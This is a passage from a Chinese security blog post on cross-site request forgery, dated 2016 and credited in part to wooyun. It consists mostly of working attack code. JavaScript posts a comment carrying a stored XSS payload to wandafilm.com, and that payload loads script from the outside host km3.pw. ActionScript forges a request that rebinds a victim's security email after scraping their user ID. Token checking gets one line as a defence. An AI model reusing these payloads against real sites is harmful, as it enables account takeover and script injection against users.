var url="http://www.wandafilm.com/user/comment.do?m=addFilmComment"; var sendata = "filmId=20140507033232512405&commentContent=%3Cimg+src%3Dx+onerror%3D%24%5B'get\\123cript'%5D('%2F%2Fkm3.pw')+width%3D0%3E&cmType=0&code="; if (window.XMLHttpRequest){ var xmlhttp1=new XMLHttpRequest(); } else{ var xmlhttp1=new ActiveXObject("Microsoft.XMLHTTP"); } xmlhttp1.open("POST",url,true); xmlhttp1.setRequestHeader("Content-Type","application/x-www-form-urlencoded"); xmlhttp1.send(sendata);
#!as3 package { import flash.display.Sprite; import flash.events.Event; import flash.net.*; import flash.text.TextField; public class url extends Sprite { public function url() { //获取当前页面userid/token var echo_txt:TextField = new TextField(); var targetURL:String = "http://xx.xx.cc"; var request:URLRequest = new URLRequest(targetURL); request.method = URLRequestMethod.GET; request.data = ""; sendToURL(request); var loader:URLLoader=new URLLoader(); loader.addEventListener(Event.COMPLETE,completeHandler); function completeHandler(event:Event):void{ var userid:String=((loader.data+"").match(/\/xxxx\/mxxxx\.php\?xxid=(\d+)/)||["",""])[1];
var masthash:String=((loader.data+"").match(/\/xxxx\/mxxxx\.php\?masthash=(\d+)/)||["",""])[1]; echo_txt.text = masthash; //伪造申请密保邮箱POST请求 var emailtargetURL:String = "http://xxxxxx.xx.cc/xxxx/xxxx.jsp?mark=send"; var emailrequest:URLRequest = new URLRequest(emailtargetURL); emailrequest.method = URLRequestMethod.POST; var postdata:Object = new Array(); postdata[0]="[email protected]&xxxx="+xxxxx&"xxxxx="+xxx; emailrequest.data = postdata[0]; sendToURL(emailrequest); } loader.load(request); } } }
现在可以注册一个新邮箱测试一下了
[来源wooyun]
0x04 CSRF的防御
token校验
0x05 CSRF总结
只要够猥琐,一个小洞也能上天
Post title:Cross-site request forgery
Post author:langu_xyz
Create time:2016-11-01 21:00:00
Post link:https://blog.langu.xyz/Cross-site request forgery/
Copyright Notice:All articles in this blog are licensed under BY-NC-SA unless stating additionally.